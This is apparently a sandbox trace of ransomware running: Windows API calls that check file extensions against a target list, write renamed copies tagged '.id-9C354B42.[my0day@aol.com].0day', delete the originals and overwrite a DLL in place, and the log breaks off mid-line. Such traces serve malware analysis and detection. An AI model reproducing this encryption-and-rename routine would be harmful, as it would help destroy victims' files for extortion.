lstrlenW (lpString=".doc") returned 4 [0051.803] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0051.803] lstrlenW (lpString=".docx") returned 5 [0051.803] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0051.803] lstrlenW (lpString=".pdf") returned 4 [0051.803] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0051.803] lstrlenW (lpString=".xls") returned 4 [0051.803] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0051.803] lstrlenW (lpString=".xlsx") returned 5 [0051.803] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0051.803] lstrlenW (lpString=".ppt") returned 4 [0051.803] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0051.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.803] lstrlenW (lpString=".zip") returned 4 [0051.803] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0051.803] lstrlenW (lpString=".rar") returned 4 [0051.803] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0051.803] lstrlenW (lpString=".bz2") returned 4 [0051.803] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0051.803] lstrlenW (lpString=".7z") returned 3 [0051.803] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0051.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.803] lstrlenW (lpString=".dbf") returned 4 [0051.803] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0051.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.803] lstrlenW (lpString=".1cd") returned 4 [0051.803] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".jpg") returned 4 [0051.804] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".doc") returned 4 [0051.804] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0051.804] lstrlenW (lpString=".docx") returned 5 [0051.804] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0051.804] lstrlenW (lpString=".pdf") returned 4 [0051.804] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString=".xls") returned 4 [0051.804] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString=".xlsx") returned 5 [0051.804] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0051.804] lstrlenW (lpString=".ppt") returned 4 [0051.804] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".zip") returned 4 [0051.804] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString=".rar") returned 4 [0051.804] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0051.804] lstrlenW (lpString=".bz2") returned 4 [0051.804] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0051.804] lstrlenW (lpString=".7z") returned 3 [0051.804] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".dbf") returned 4 [0051.804] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".1cd") returned 4 [0051.804] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0051.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0051.804] lstrlenW (lpString=".jpg") returned 4 [0051.804] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0051.805] lstrcmpiW (lpString1=".FNT", lpString2=".0day") returned 1 [0051.805] lstrlenW (lpString="CGMIMP32.FNT") returned 12 [0051.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0052.558] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=606062) returned 1 [0052.560] CloseHandle (hObject=0x16c) returned 1 [0052.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20 [0052.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0052.568] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.573] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.578] GetLastError () returned 0x0 [0052.578] ReadFile (in: hFile=0x178, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x93f6e, lpOverlapped=0x0) returned 1 [0052.592] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x93f70, lpOverlapped=0x0) returned 1 [0052.601] ReadFile (in: hFile=0x178, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.601] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.602] SetEndOfFile (hFile=0x190) returned 1 [0052.602] CloseHandle (hObject=0x190) returned 1 [0052.602] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.602] SetEndOfFile (hFile=0x178) returned 1 [0052.607] CloseHandle (hObject=0x178) returned 1 [0052.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.607] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1 [0052.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.607] lstrlenW (lpString=".doc") returned 4 [0052.607] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0052.607] lstrlenW (lpString=".docx") returned 5 [0052.607] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0052.607] lstrlenW (lpString=".pdf") returned 4 [0052.607] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0052.607] lstrlenW (lpString=".xls") returned 4 [0052.608] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString=".xlsx") returned 5 [0052.608] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0052.608] lstrlenW (lpString=".ppt") returned 4 [0052.608] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString=".zip") returned 4 [0052.608] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString=".rar") returned 4 [0052.608] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString=".bz2") returned 4 [0052.608] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0052.608] lstrlenW (lpString=".7z") returned 3 [0052.608] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString=".dbf") returned 4 [0052.608] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString=".1cd") returned 4 [0052.608] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString=".jpg") returned 4 [0052.608] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.608] lstrlenW (lpString=".doc") returned 4 [0052.608] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0052.608] lstrlenW (lpString=".docx") returned 5 [0052.608] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0052.608] lstrlenW (lpString=".pdf") returned 4 [0052.608] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString=".xls") returned 4 [0052.608] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0052.608] lstrlenW (lpString=".xlsx") returned 5 [0052.608] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0052.609] lstrlenW (lpString=".ppt") returned 4 [0052.609] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0052.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.609] lstrlenW (lpString=".zip") returned 4 [0052.609] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0052.609] lstrlenW (lpString=".rar") returned 4 [0052.609] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0052.609] lstrlenW (lpString=".bz2") returned 4 [0052.609] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0052.609] lstrlenW (lpString=".7z") returned 3 [0052.609] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0052.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.609] lstrlenW (lpString=".dbf") returned 4 [0052.609] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0052.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.609] lstrlenW (lpString=".1cd") returned 4 [0052.609] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0052.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.609] lstrlenW (lpString=".jpg") returned 4 [0052.609] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0052.609] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0052.609] lstrlenW (lpString="PNG32.FLT") returned 9 [0052.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0052.610] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=302976) returned 1 [0052.610] CloseHandle (hObject=0x178) returned 1 [0052.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 0x20 [0052.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0052.610] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.610] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0052.610] GetLastError () returned 0x0 [0052.610] ReadFile (in: hFile=0x178, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x49f80, lpOverlapped=0x0) returned 1 [0052.657] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x49f90, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x49f90, lpOverlapped=0x0) returned 1 [0052.661] ReadFile (in: hFile=0x178, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.661] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.662] SetEndOfFile (hFile=0x190) returned 1 [0053.544] CloseHandle (hObject=0x190) returned 1 [0053.603] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.603] SetEndOfFile (hFile=0x178) returned 1 [0053.959] CloseHandle (hObject=0x178) returned 1 [0053.959] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.959] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt")) returned 1 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString=".doc") returned 4 [0053.960] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.960] lstrlenW (lpString=".docx") returned 5 [0053.960] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.960] lstrlenW (lpString=".pdf") returned 4 [0053.960] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.960] lstrlenW (lpString=".xls") returned 4 [0053.960] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.960] lstrlenW (lpString=".xlsx") returned 5 [0053.960] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.960] lstrlenW (lpString=".ppt") returned 4 [0053.960] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString=".zip") returned 4 [0053.960] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.960] lstrlenW (lpString=".rar") returned 4 [0053.960] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.960] lstrlenW (lpString=".bz2") returned 4 [0053.960] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.960] lstrlenW (lpString=".7z") returned 3 [0053.960] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString=".dbf") returned 4 [0053.960] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString=".1cd") returned 4 [0053.960] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.960] lstrlenW (lpString=".jpg") returned 4 [0053.960] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString=".doc") returned 4 [0053.961] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.961] lstrlenW (lpString=".docx") returned 5 [0053.961] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.961] lstrlenW (lpString=".pdf") returned 4 [0053.961] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString=".xls") returned 4 [0053.961] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString=".xlsx") returned 5 [0053.961] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.961] lstrlenW (lpString=".ppt") returned 4 [0053.961] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString=".zip") returned 4 [0053.961] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString=".rar") returned 4 [0053.961] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.961] lstrlenW (lpString=".bz2") returned 4 [0053.961] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.961] lstrlenW (lpString=".7z") returned 3 [0053.961] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString=".dbf") returned 4 [0053.961] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString=".1cd") returned 4 [0053.961] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.961] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.961] lstrlenW (lpString=".jpg") returned 4 [0053.961] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.962] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0053.962] lstrlenW (lpString="ITIRCL55.DLL") returned 12 [0053.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.962] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=1831424) returned 1 [0053.962] CloseHandle (hObject=0x178) returned 1 [0053.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll")) returned 0x20 [0053.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0055.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.141] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0055.141] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.141] ReadFile (in: hFile=0x178, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.145] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.145] ReadFile (in: hFile=0x178, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0055.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0055.149] ReadFile (in: hFile=0x178, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.229] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.229] WriteFile (in: hFile=0x178, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0055.253] SetEndOfFile (hFile=0x178) returned 1 [0055.253] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fc20d0 [0055.378] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.378] WriteFile (in: hFile=0x178, lpBuffer=0x3fc20d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc20d0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.379] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.379] WriteFile (in: hFile=0x178, lpBuffer=0x3fc20d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fc20d0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.381] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 